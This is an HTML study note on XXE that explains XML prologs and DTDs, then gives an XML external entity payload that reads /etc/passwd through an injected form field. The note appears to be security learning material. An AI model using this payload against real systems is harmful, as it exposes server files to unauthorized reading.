<html>
  
  <head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <link rel="stylesheet" href="../../style.css">
    <base target="_parent">
    <title data-trilium-title>XXE</title>
  </head>
  
  <body>
    <div class="content">
       <h1 data-trilium-h1>XXE</h1>

      <div class="ck-content">
        <p>XML (eXtensible Markup Language) is a markup language that defines a set
          of rules for encoding documents in a format that is both human-readable
          and machine-readable. It is a markup language used for storing and transporting
          data.</p>
        <p>Every XML document mostly starts with what is known as XML Prolog.
          <br
          />
          <br /><code>&lt;?xml version="1.0" encoding="UTF-8"?&gt;</code>

        </p>
        <p>DTD stands for Document Type Definition. A DTD defines the structure and
          the legal elements and attributes of an XML document.</p>
        <p><code>&lt;!DOCTYPE note [ &lt;!ELEMENT note (to,from,heading,body)&gt; &lt;!ELEMENT to (#PCDATA)&gt; &lt;!ELEMENT from (#PCDATA)&gt; &lt;!ELEMENT heading (#PCDATA)&gt; &lt;!ELEMENT body (#PCDATA)&gt; ]&gt;</code>

        </p>
        <p>So now let's understand how that DTD validates the XML. Here's what all
          those terms used in <code>note.dtd</code> mean</p>
        <ul>
          <li>!DOCTYPE note -  Defines a root element of the document named <strong>note</strong>

          </li>
          <li>!ELEMENT note - Defines that the note element must contain the elements:
            "to, from, heading, body"</li>
          <li>!ELEMENT to - Defines the <code>to</code> element to be of type "#PCDATA"</li>
          <li>!ELEMENT from - Defines the <code>from</code> element to be of type "#PCDATA"</li>
          <li>!ELEMENT heading  - Defines the <code>heading</code> element to be of type
            "#PCDATA"</li>
          <li>!ELEMENT body - Defines the <code>body</code> element to be of type "#PCDATA"</li>
        </ul>
        <p>    <strong>NOTE</strong>: #PCDATA means parseable character data.</p>
        <p><code>&lt;?xml version="1.0" ?&gt;</code>

          <br /><code>&lt;!DOCTYPE foo [ &lt;!ELEMENT foo ANY &gt;</code>

          <br /><code>&lt;!ENTITY xxe SYSTEM "file:///etc/passwd"&gt;]&gt;</code>

        </p>
        <p><code>&lt;root&gt;&lt;name&gt;</code>

          <br /><code>aa</code>

          <br /><code>&lt;/name&gt;&lt;tel&gt;aa&lt;/tel&gt;&lt;email&gt;&amp;xxe;&lt;/email&gt;&lt;password&gt;aa&lt;/password&gt;&lt;/root&gt;</code>

        </p>
      </div>
    </div>
  </body>

</html>